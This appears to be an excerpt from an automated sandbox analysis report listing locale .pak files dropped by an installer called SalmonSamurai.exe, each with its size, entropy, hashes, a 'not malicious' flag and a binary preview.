                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:C0EF1866167D926FB351E9F9BF13F067
                                                                                                                                                                                                                                              SHA1:6092D04EF3CE62BE44C29DA5D0D3A04985E2BC04
                                                                                                                                                                                                                                              SHA-256:88DF231CF2E506DB3453F90A797194662A5F85E23BBAC2ED3169D91A145D2091
                                                                                                                                                                                                                                              SHA-512:9E2B90F3AC1AE5744C22C2442FBCD86A8496AFC2C58F6CA060D6DBB08AF6F7411EF910A7C8CA5AEDEE99B5443D4DFF709C7935E8322CB32F8B071EE59CAEE733
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........(...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.#...t.,...v.A...w.N...y.T...z.c...|.i...}.{.......................................................................9.....[.....}...................................!...................................).....\.............................?.......................&.....E.....a.....w.......................[...............................................4.....^.......................L...................................&.....2.....U.....n.......................i.....................................................;.....X.........................................:.....m.....t.....w.....y.........................................7...................................-.....F.....f.....o.............................".....v.................O.............................?.....t......... .....".....%.,...(.b...*.....+.....,.........../.?...0.L...1.....3.....4.....5.P...6.....7.....8.:...9.b...;.....<.....=.....>.....?.....@.I...A.}...C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ms.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):390303
                                                                                                                                                                                                                                              Entropy (8bit):5.258177538585681
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:9B3E2F3C49897228D51A324AB625EB45
                                                                                                                                                                                                                                              SHA1:8F3DAEC46E9A99C3B33E3D0E56C03402CCC52B9D
                                                                                                                                                                                                                                              SHA-256:61A3DAAE72558662851B49175C402E9FE6FD1B279E7B9028E49506D9444855C5
                                                                                                                                                                                                                                              SHA-512:409681829A861CD4E53069D54C80315E0C8B97E5DB4CD74985D06238BE434A0F0C387392E3F80916164898AF247D17E8747C6538F08C0EF1C5E92A7D1B14F539
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........c...h.(...i.0...j.<...k.K...l.V...n.^...o.c...p.p...r.v...s.....t.....v.....w.....y.....z.....|.....}................................................................... .....J.....].....q.................................................................<.....R.....r.....{.......................................................................+.....;.....J.....y.............................................................................6.....S.....w.............................................................................:.....S....._.................................................................0.....I.....`.....s.....z.....}.....~.....................................................M.....T.................................................................2.....N.....f.....................................................,.....:... .=...".I...%.u...(.....*.....+.....,.........../.....0.....1.....3.;...4.Z...5.m...6.....7.....8.....9.....;.....<.....=.....>.:...?.B...@.W...A...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\nb.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):383011
                                                                                                                                                                                                                                              Entropy (8bit):5.424530593988954
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:AF0FD9179417BA1D7FCCA3CC5BEE1532
                                                                                                                                                                                                                                              SHA1:F746077BBF6A73C6DE272D5855D4F1CA5C3AF086
                                                                                                                                                                                                                                              SHA-256:E900F6D0DD9D5A05B5297618F1FE1600C189313DA931A9CB390EE42383EB070F
                                                                                                                                                                                                                                              SHA-512:C94791D6B84200B302073B09357ABD2A1D7576B068BAE01DCCDA7BC154A6487145C83C9133848CCF4CB9E6DC6C5A9D4BE9D818E5A0C8F440A4E04AE8EABD4A29
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........S...h.....i.....j.+...k.:...l.E...n.M...o.R...p._...r.e...s.v...t.....v.....w.....y.....z.....|.....}.........................................................................3.....>.....M.....`.....h.....r.....................................................$.....<.....A.....P.....a.....h.....t...........................................................).....\.....o.....v.....{...........................................................).....A.....Z.....e.....i.....q.....x.....~...........................................................5.....X.....n.....w.........................................................................................!.....).....4.....;.....F.....v.......................>.....X.....p...........................................................&.....?.....W................................................... .....".....%. ...(.@...*.c...+.f...,.........../.....0.....1.....3.....4.....5.....6.L...7.c...8.....9.....;.....<.....=.....>.....?.....@.....A.....C.".

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\nl.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):395064
                                                                                                                                                                                                                                              Entropy (8bit):5.365550895872654
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:181D2A0ECE4B67281D9D2323E9B9824D
                                                                                                                                                                                                                                              SHA1:E8BDC53757E96C12F3CD256C7812532DD524A0EA
                                                                                                                                                                                                                                              SHA-256:6629E68C457806621ED23AA53B3675336C3E643F911F8485118A412EF9ED14CE
                                                                                                                                                                                                                                              SHA-512:10D8CC9411CA475C9B659A2CC88D365E811217D957C82D9C144D94843BC7C7A254EE2451A6F485E92385A660FA01577CFFA0D64B6E9E658A87BEF8FCCBBEAF7E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........E...h.....i.....j.....k.....l.#...n.+...o.0...p.=...r.C...s.T...t.]...v.r...w.....y.....z.....|.....}...............................................................................$.....4.....E.....N.....W.....r.....z.....................................................'.....7.....I.....V.....c...........................................................!.....`.....u.....z...........................................................+.....G.....f.......................................................................9.....E.....].....v.....................................................2.....F.....Y.....t.................................................................'.....a...................................<.....I.....Y.....a.....j.....n.....r...................................".....O.....d.....m.....x..................... .....".....%.....(.....*.....+.....,.!.....2.../.I...0.S...1.....3.....4.....5.....6.....7.....8.;...9.J...;.Z...<.h...=.v...>.....?.....@.....A.....C.....D...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\pl.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):439920
                                                                                                                                                                                                                                              Entropy (8bit):5.766175831058526
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:18D49D5376237BB8A25413B55751A833
                                                                                                                                                                                                                                              SHA1:0B47A7381DE61742AC2184850822C5FA2AFA559E
                                                                                                                                                                                                                                              SHA-256:1729AA5C8A7E24A0DB98FEBCC91DF8B7B5C16F9B6BB13A2B0795038F2A14B981
                                                                                                                                                                                                                                              SHA-512:45344A533CC35C8CE05CF29B11DA6C0F97D8854DAE46CF45EF7D090558EF95C3BD5FDC284D9A7809F0B2BF30985002BE2AA6A4749C0D9AE9BDFF4AD13DE4E570
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........T...h.....i.....j.%...k.4...l.?...n.G...o.L...p.Y...r._...s.p...t.y...v.....w.....y.....z.....|.....}.........................................................................6.....E.....S.....h.....q...........................................................3.....M.....S.....g.....|.................................................................).....;.....n.............................................................................2.....N.....i.....{.................................................................+.....6.....V.....c...........................................................(.....7.....M.....d.....{...........................................................T.............................,.....i.....r.....................................................7.....V.....r............................................. .....".)...%.K...(.c...*.....+.....,.........../.....0.....1.....3.,...4.K...5.i...6.....7.....8.....9.....;.....<.....=.....>.....?.$...@.7...A.{...C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\pt-BR.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):415447
                                                                                                                                                                                                                                              Entropy (8bit):5.426006792591415
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:0D9DEA9E24645C2A3F58E4511C564A36
                                                                                                                                                                                                                                              SHA1:DCD2620A1935C667737EEA46CA7BB2BDCB31F3A6
                                                                                                                                                                                                                                              SHA-256:CA7B880391FCD319E976FCC9B5780EA71DE655492C4A52448C51AB2170EEEF3B
                                                                                                                                                                                                                                              SHA-512:8FCF871F8BE7727E2368DF74C05CA927C5F0BC3484C4934F83C0ABC98ECAF774AD7ABA56E1BF17C92B1076C0B8EB9C076CC949CD5427EFCADE9DDF14F6B56BC5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........j...h.6...i.G...j.S...k.b...l.m...n.u...o.z...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................".....).....0.....1.....2.....7....._.....q.....................................................#.....%.....).....T.....c.....|...................................................../.....F.....P.....X.....h.....y...........................................................%.....:.....H.....Y.....r.................................................................+.....5.....F.....~...............................................).....;.....S.....V.....g.....y.............................................................................=.....y............................. .....H.....R.....i.....p.....z...............................................3.....f....................................... .....".....%.....(.....*.(...+.+...,.I.....Z.../.n...0.w...1.....3.....4.....5.....6.-...7.A...8.Y...9.l...;.|...<.....=.....>.....?.....@.....A.....C.!...D.+.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\pt-PT.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):416977
                                                                                                                                                                                                                                              Entropy (8bit):5.401132911995885
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6A7232F316358D8376A1667426782796
                                                                                                                                                                                                                                              SHA1:8B70FE0F3AB2D73428F19ECD376C5DEBA4A0BB6C
                                                                                                                                                                                                                                              SHA-256:6A526CD5268B80DF24104A7F40F55E4F1068185FEBBBB5876BA2CB7F78410F84
                                                                                                                                                                                                                                              SHA-512:40D24B3D01E20AE150083B00BB6E10BCA81737C48219BCE22FA88FAAAD85BDC8C56AC9B1EB01854173B0ED792E34BDFBAC26D3605B6A35C14CF2824C000D0DA1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........s...h.H...i.Y...j.e...k.t...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................%.....-.....4.....;.....B.....C.....D.....I.....r...........................................................&.....(.....,.....W.....f...........................................................!.....9.....C.....K.....\.....n.................................................................%.....3.....D.....b.................................................................#.....+.....<.....t.....~...............................................(.....:.....T.....W.....h.....|.............................................................................N...................................0.....X.....b.....|.....................................................;.....^............................................. .....".....%.....(.3...*.P...+.S...,.q........./.....0.....1.....3.....4.....5.8...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.+...A.a...C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ro.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):430191
                                                                                                                                                                                                                                              Entropy (8bit):5.460617985170646
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:99EAA3D101354088379771FD85159DE1
                                                                                                                                                                                                                                              SHA1:A32DB810115D6DCF83A887E71D5B061B5EEFE41F
                                                                                                                                                                                                                                              SHA-256:33F4C20F7910BC3E636BC3BEC78F4807685153242DD4BC77648049772CF47423
                                                                                                                                                                                                                                              SHA-512:C6F87DA1B5C156AA206DC21A9DA3132CBFB0E12E10DA7DC3B60363089DE9E0124BBAD00A233E61325348223FC5953D4F23E46FE47EC8E7CA07702AC73F3FD2E9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........L...h.....i.....j.....k.$...l./...n.7...o.<...p.I...r.O...s.`...t.i...v.~...w.....y.....z.....|.....}.........................................................................1.....@.....L.....Z.....e.....p...........................................................<.....E.....^.....n.....y...............................................+.....?.....T.................................................................M.....n...................................#.....+.....2.....8.....G.....Y.....n.....u...............................................T.....b.....t.....................................................,.....@.....G.....J.....K.....W.....c.....p.....y.................).....r.....z.............................9.....S.....d.....l.....r.....x.............................3.....V............................................. .....".....%.<...(.S...*.k...+.n...,.........../.....0.....1.....3.....4.'...5.G...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.&...A._...C.....D...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ru.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):703696
                                                                                                                                                                                                                                              Entropy (8bit):4.836890612319527
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:AB9902025DCF7D5408BF6377B046272B
                                                                                                                                                                                                                                              SHA1:C9496E5AF3E2A43377290A4883C0555E27B1F10F
                                                                                                                                                                                                                                              SHA-256:983B15DCC31D0E9A3DA78CD6021E5ADD2A3C2247322ADED9454A5D148D127AAE
                                                                                                                                                                                                                                              SHA-512:D255D5F5B6B09AF2CDEC7B9C171EEBB1DE1094CC5B4DDF43A3D4310F8F5F223AC48B8DA97A07764D1B44F1D4A14FE3A0C92A0CE6FE9A4AE9A6B4A342E038F842
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........S.h.....i.....j.....k.....l.....n.#...o.(...p.5...r.;...s.L...t.U...v.j...w.w...y.}...z.....|.....}.........................................................................:.....W.....t.........................................E.....l.....n.....r...................................(.....A.....K.............................3.....?.....b.......................+.....5.....F.....[.....v.........................................8.....f.........................................*.....K.....e...................................H.....i.............................7.....t.....w...................................B.....I.....L.....M.....].....q...................................>.....J.................#.....e.........................................6.....t.................:.......................#.....7.....G.....w......... .....".....%.....(.....*.....+.....,.........../.....0.....1.]...3.t...4.....5.....6.N...7.r...8.....9.....;.....<.....=.....>.8...?.G...@.f...A.....C.!...D.2...E.j...F...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\sk.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):443094
                                                                                                                                                                                                                                              Entropy (8bit):5.818852266406701
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:C6C7396DBFB989F034D50BD053503366
                                                                                                                                                                                                                                              SHA1:089F176B88235CCE5BCA7ABFCC78254E93296D61
                                                                                                                                                                                                                                              SHA-256:439F7D6C23217C965179898754EDCEF8FD1248BDD9B436703BF1FF710701117A
                                                                                                                                                                                                                                              SHA-512:1476963F47B45D2D26536706B7EEBA34CFAE124A3087F7727C4EFE0F19610F94393012CDA462060B1A654827E41F463D7226AFA977654DCD85B27B7F8D1528EB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........U...h.....i. ...j.,...k.;...l.F...n.N...o.S...p.`...r.f...s.w...t.....v.....w.....y.....z.....|.....}.........................................................................A.....U.....].....o.....z.....................................................9.....R.....q.....w...............................................!.....0.....6.....>.....N....._.....s.....................................................$.....:.....L.....h.......................................................................".....=.....|...............................................*.....9.....a.....d.....v...................................................................................d.......................t.........................................%.....0.....9.....P.....x.............................U.....r.....z........................... .....".....%.....(.....*.6...+.9...,.W.....h.../.....0.....1.....3.....4.....5.....6.D...7.Y...8.p...9.....;.....<.....=.....>.....?.....@.....A.(...C.I...D.T...E.t.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\sl.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):427791
                                                                                                                                                                                                                                              Entropy (8bit):5.48540289392965
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:D4BD9F20FD29519D6B017067E659442C
                                                                                                                                                                                                                                              SHA1:782283B65102DE4A0A61B901DEA4E52AB6998F22
                                                                                                                                                                                                                                              SHA-256:F33AFA6B8DF235B09B84377FC3C90403C159C87EDD8CD8004B7F6EDD65C85CE6
                                                                                                                                                                                                                                              SHA-512:ADF8D8EC17E8B05771F47B19E8027F88237AD61BCA42995F424C1F5BD6EFA92B23C69D363264714C1550B9CD0D03F66A7CFB792C3FBF9D5C173175B0A8C039DC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........A...h.....i.....j.....k.....l.....n.!...o.&...p.3...r.9...s.J...t.S...v.h...w.u...y.{...z.....|.....}.....................................................................................*.....:.....B.....R.....y...............................................,.....D.....N.....X.....b.....m.....{.................................................................M.....c.....h.....o...........................................................%.....C.....d.................................................................3.....=.....L.....c.....v.....................................................-.....@.....P.....e.....|.................................................................Y.............................2.....m.....z.....................................................2.....H.....o............................................. .....".....%.....(.P...*.t...+.w...,.........../.....0.....1.....3. ...4.<...5.Q...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.,...A.....C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\sr.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):660194
                                                                                                                                                                                                                                              Entropy (8bit):4.761695251077794
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:CBB817A58999D754F99582B72E1AE491
                                                                                                                                                                                                                                              SHA1:6EC3FD06DEE0B1FE5002CB0A4FE8EC533A51F9FD
                                                                                                                                                                                                                                              SHA-256:4BD7E466CB5F5B0A451E1192AA1ABAAF9526855A86D655F94C9CE2183EC80C25
                                                                                                                                                                                                                                              SHA-512:EFEF29CEDB7B08D37F9DF1705D36613F423E994A041B137D5C94D2555319FFB068BB311884C9D4269B0066746DACD508A7D01DF40A8561590461D5F02CB52F8B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........e...h.,...i.=...j.I...k.X...l.c...n.k...o.p...p.}...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................&.....'.....(.....*.....y............................. .....b.........................................?.....c.........................................?.....V.....o...................................3.....R...................................'.....1.....A.....M.....l.............................J.....................................................4.....@.....c.............................-.....l...................................P.....S.....n.....................................................%.....1.....J.....Y.....o.......................).................&.....n...............................................g.......................H...................................0.....E... .Y...".....%.....(.....*.....+."...,.@.....h.../.....0.....1.....3.....4.R...5.....6.....7.....8.B...9.v...;.....<.....=.....>.....?.....@.....A.....C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\sv.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):385361
                                                                                                                                                                                                                                              Entropy (8bit):5.543491670458518
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:502E4A8B3301253ABE27C4FD790FBE90
                                                                                                                                                                                                                                              SHA1:17ABCD7A84DA5F01D12697E0DFFC753FFB49991A
                                                                                                                                                                                                                                              SHA-256:7D72E3ADB35E13EC90F2F4271AD2A9B817A2734DA423D972517F3CFF299165FD
                                                                                                                                                                                                                                              SHA-512:BD270ABAF9344C96B0F63FC8CEC04F0D0AC9FC343AB5A80F5B47E4B13B8B1C0C4B68F19550573A1D965BB18A27EDF29F5DD592944D754B80EA9684DBCEDEA822
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........0...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.*...t.3...v.H...w.U...y.[...z.j...|.p...}...........................................................................................!.....).....2.....M.....U.....`...........................................................&.....-.....:.....c.....t.........................................................../.....;.....C.....U.....e.....i.....s.....z...................................%.....H.....S.....Y.....a.....h.....n.....{.....................................................).....R.....q.....y.................................................................$.....+.........../.....7.....?.....J.....R.....].................".....).....u.................................................................'.....?.....k...............................................".....*... ./...".9...%.[...(.x...*.....+.....,.........../.....0.....1.....3.)...4.P...5.e...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.%...A.Q...C.p.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\sw.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):404460
                                                                                                                                                                                                                                              Entropy (8bit):5.342349721117576
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:39277AE2D91FDC1BD38BEA892B388485
                                                                                                                                                                                                                                              SHA1:FF787FB0156C40478D778B2A6856AD7B469BD7CB
                                                                                                                                                                                                                                              SHA-256:6D6D095A1B39C38C273BE35CD09EB1914BD3A53F05180A3B3EB41A81AE31D5D3
                                                                                                                                                                                                                                              SHA-512:BE2D8FBEDAA957F0C0823E7BEB80DE570EDD0B8E7599CF8F2991DC671BDCBBBE618C15B36705D83BE7B6E9A0D32EC00F519FC8543B548422CA8DCF07C0548AB4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........Y...h.....i.....j.+...k.:...l.E...n.M...o.R...p._...r.e...s.v...t.....v.....w.....y.....z.....|.....}.........................................................................3.....E.....U.....i.....u...........................................................+.....H.....N.....Z.....m.....z.....................................................$.....8.....E.....p.......................................................................8.....W.....{................................................................. .....[.....m.....{...................................(.....4.....K.....x.....{.........................................................................................+.....\...................................+.....P.....Z.....r.....x...............................................-.....L............................................. .....".....%.....(.7...*.S...+.V...,.t........./.....0.....1.....3.....4.....5.1...6.i...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.9.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ta.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1043803
                                                                                                                                                                                                                                              Entropy (8bit):4.044068430611977
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:7006691481966109CCE413F48A349FF2
                                                                                                                                                                                                                                              SHA1:6BD243D753CF66074359ABE28CFAE75BCEDD2D23
                                                                                                                                                                                                                                              SHA-256:24EA4028DA66A293A43D27102012235198F42A1E271FE568C7FD78490A3EE647
                                                                                                                                                                                                                                              SHA-512:E12C0D1792A28BF4885E77185C2A0C5386438F142275B8F77317EB8A5CEE994B3241BB264D9502D60BFBCE9CF8B3B9F605C798D67819259F501719D054083BEA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........(...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.#...v.8...w.E...y.K...z.Z...|.`...}.r.....z.................................................................M.....{.............................v.......................n.....p.....t.................E.....c.......................;.......................0.....m...............................................$.....`...................................0.....y.................9.............................!.....(.....F.....n.......................3.............................F...........;.....`.......................7.....:.....n.................$.....Z.....................................................E.....#.......................Q.................c.............................#...../.....s.............................B.................*.....?.....d............... .....".....%.}...(.....*.O...+.R...,.p........./.....0.....1.u...3.....4.....5.....6.....7.]...8.....9.....;.'...<.G...=.j...>.....?.....@.....A.9...C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\te.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):965006
                                                                                                                                                                                                                                              Entropy (8bit):4.295544641165274
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:F809BF5184935C74C8E7086D34EA306C
                                                                                                                                                                                                                                              SHA1:709AB3DECFF033CF2FA433ECC5892A7AC2E3752E
                                                                                                                                                                                                                                              SHA-256:9BBFA7A9F2116281BF0AF1E8FFB279D1AA97AC3ED9EBC80C3ADE19E922D7E2D4
                                                                                                                                                                                                                                              SHA-512:DE4B14DD6018FDBDF5033ABDA4DA2CB9F5FCF26493788E35D88C07A538B84FDD663EE20255DFD9C1AAC201F0CCE846050D2925C55BF42D4029CB78B057930ACD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........o...h.@...i.Z...j.f...k.u...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................&...........5.....<.....C.....D.....E.....J.................5.....r.............................#.............................8.....~.......................T.....v.......................x...........#.....A.....c.......................s.......................=...................................V.................v...........>.....s.........................................h.....}.................L.....g.................n.......................:.....c.............................".....R.........................................%.....L.....s.................k...................................1.............................A.....V.....e...........".....r...........P...........>.............................U.....|... .....".....%.....(.q...*.....+.....,.........../.n...0.....1.#...3.F...4.....5.....6.O...7.....8.....9.$...;.Q...<.n...=.....>.....?.....@.....A.Z.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\th.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):811437
                                                                                                                                                                                                                                              Entropy (8bit):4.342029978594925
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:2C41616DFE7FCDB4913CFAFE5D097F95
                                                                                                                                                                                                                                              SHA1:CF7D9E8AD3AA47D683E47F116528C0E4A9A159B0
                                                                                                                                                                                                                                              SHA-256:F11041C48831C93AA11BBF885D330739A33A42DB211DACCF80192668E2186ED3
                                                                                                                                                                                                                                              SHA-512:97329717E11BC63456C56022A7B7F5DA730DA133E3FC7B2CC660D63A955B1A639C556B857C039A004F92E5F35BE61BF33C035155BE0A361E3CD6D87B549DF811
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........y.h.....i.....j.....k.....l.....o.....p.....r.....s.....t.....v.....w.....y.....z.,...|.2...}.D.....L.....Q.....Y.....d.....l.....q.....y.............................................................................(.....7................................... .....Y.....k.............................=.....\.....z.............................^.................d.....................................................J.....w.......................F.....y...............................................,.....J.....t.................".....y.................E.....c...................................&.....G.....d.....................................................;...........P.................n.................j.........................................9.......................C.....{...........5.....>.....S..................... .....".....%.?...(.....*.....+.....,.........../.U...0.h...1.....3.....4.V...5.....6.)...7.J...8.....9.....;.....<.....=.....>.X...?.....@.....A.....C. ...D.<...E.o.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\tr.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):411446
                                                                                                                                                                                                                                              Entropy (8bit):5.6133974766805546
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:3A858619502C68D5F7DE599060F96DB9
                                                                                                                                                                                                                                              SHA1:80A66D9B5F1E04CDA19493FFC4A2F070200E0B62
                                                                                                                                                                                                                                              SHA-256:D81F28F69DA0036F9D77242B2A58B4A76F0D5C54B3E26EE96872AC54D7ABB841
                                                                                                                                                                                                                                              SHA-512:39A7EC0DFE62BCB3F69CE40100E952517B5123F70C70B77B4C9BE3D98296772F10D3083276BC43E1DB66ED4D9BFA385A458E829CA2A7D570825D7A69E8FBB5F4
                                                                                                                                                                                                                                              Malicious:false
